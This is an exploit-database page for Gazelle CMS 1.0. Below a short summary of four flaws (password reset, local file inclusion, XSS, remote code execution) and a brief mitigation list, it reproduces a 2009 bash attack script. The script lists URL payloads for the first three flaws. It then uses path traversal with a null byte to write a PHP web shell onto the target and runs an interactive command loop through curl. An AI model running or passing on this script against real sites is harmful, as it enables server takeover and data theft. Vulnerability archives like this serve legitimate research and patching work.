header-logo
Suggest Exploit
vendor:
Gazelle CMS
by:
white_sheep
9,3
CVSS
HIGH
Password Reset, LFI, XSS, RCE
79, 94, 79, 78
CWE
Product Name: Gazelle CMS
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:anantasoft:gazelle_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2009

Gazelle CMS 1.0 Multiple Vulnerabilities

Gazelle CMS 1.0 is vulnerable to multiple vulnerabilities such as Password Reset, Local File Inclusion, Cross-Site Scripting and Remote Code Execution. The Password Reset vulnerability allows an attacker to reset the password of any user by sending a crafted request to the renew.php file. The Local File Inclusion vulnerability allows an attacker to include a remote file by sending a crafted request to the index.php file. The Cross-Site Scripting vulnerability allows an attacker to inject malicious JavaScript code by sending a crafted request to the user.php and search.php files. The Remote Code Execution vulnerability allows an attacker to execute arbitrary code on the server by sending a crafted request to the settemplate.php file.

Mitigation:

Disable magic_quote_gpc, Validate user input, Sanitize user input, Use a WAF, Update to the latest version of Gazelle CMS
Source

Exploit-DB raw data:

#!/bin/bash
#       Gazelle CMS 1.0 Multiple Vulnerabilities
#       Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
#       Found by white_sheep on 11/08/2009
#       Contact: sheewhite@googlemail.com - https://www.ihteam.net
#       Need magic_quote_gpc Off for RCE and LFI
#       Thanks to r00t
#
#               PASSWORD RESET:
# http://localhost/gazelle/renew.php?user=[username]
#
#               LFI:
# author: fuzion (milw0rm.com/author/1343)
# http://localhost/gazelle/index.php?template=[LFI]
#
#               XSS:
# http://localhost/gazelle/user.php?user=</title>[XSS]
# http://localhost/gazelle/search.php?lookup=<script+type="text/javascript">[CODE]</script>
#
#               RCE:
echo
echo "###############################################"
echo "#             GazelleCMS 1.0 RCE              #"
echo "#  by white_sheep				    #"
echo "#  sheewhite[at]googlemail[dot]com            #"
echo "#						    #"
echo "#           https://www.ihteam.net            #"
echo "###############################################"
echo


EVILC='<?php passthru($_GET[cmd]); ?>'

echo -n "Insert url with path (ex.: http://localhost/gazelle): " 
read SITE

PAGENAME=/modules/menu$RANDOM'.bak.php'

curl -F "siteTitle='INIT'$EVILC'EOF';type=text/html" $SITE'/admin/settemplate.php?customizetemplate=..'$PAGENAME'%00' 1>/dev/null 2>/dev/null

if [ "`curl -s $SITE''$PAGENAME | grep siteTitle`" == "" ]
then 
	echo "[-] Not Vulnerable :( byee"
	exit
fi

while true
do
	echo -n "sh$: "
	read -r CMD
	CMD=`echo $CMD | sed 's/ /+/g'`
	echo $CMD
	curl -s "$SITE$PAGENAME?cmd=$CMD" | sed "s/.*'INIT'//g;s/'EOF'.*//g"
	echo
done

# milw0rm.com [2009-08-12]

Navigation

Suggest Exploit

Services By CQR